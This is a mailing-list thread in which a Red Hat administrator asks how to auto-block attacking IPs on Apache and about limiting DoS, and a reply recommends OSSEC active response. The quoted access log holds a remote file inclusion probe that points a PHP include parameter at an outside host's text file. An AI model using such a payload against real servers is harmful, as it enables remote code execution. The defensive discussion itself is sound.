You may wish to look into OSSEC ; will do integrity checking, rootkit
detection, event log correlation, has an excellent default rules base,
can accept just about any kind of logfile and decode it
http://www.ossec.net/wiki/index.php/Main_Page
It will also do what your looking for (OSSEC calls it active response).
Setup time for a new install is about 5 minutes.
Aaron
ESGLinux wrote:
Hi all,
I´m having a problem with an Apache web server.
I get a lot of access ot this kind:
x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET
//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt???
HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
where x.x.x.x is the ip of the client, I suposse this ip is trying to find a
security hole in my system, so what I do manually is this:
iptables -A INPUT -s x.x.x.x -p tcp -m tcp --dport 80 -j DROP
I want to do this automatically. I´m thinking to use logwatch but I´m not
sure how to do it. (I´m testing but for the moment I haven´t found the
solution)
anybody knows another way to do what I want?
By the way, I´m interesting to limit the connections to my webserver using
iptables with limit module and busrt argument. What do you think about it?
is a good solution or I´m on the wrong way? Do you know how to prevent DOS
attacks?
Thanks in advance
ESG
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
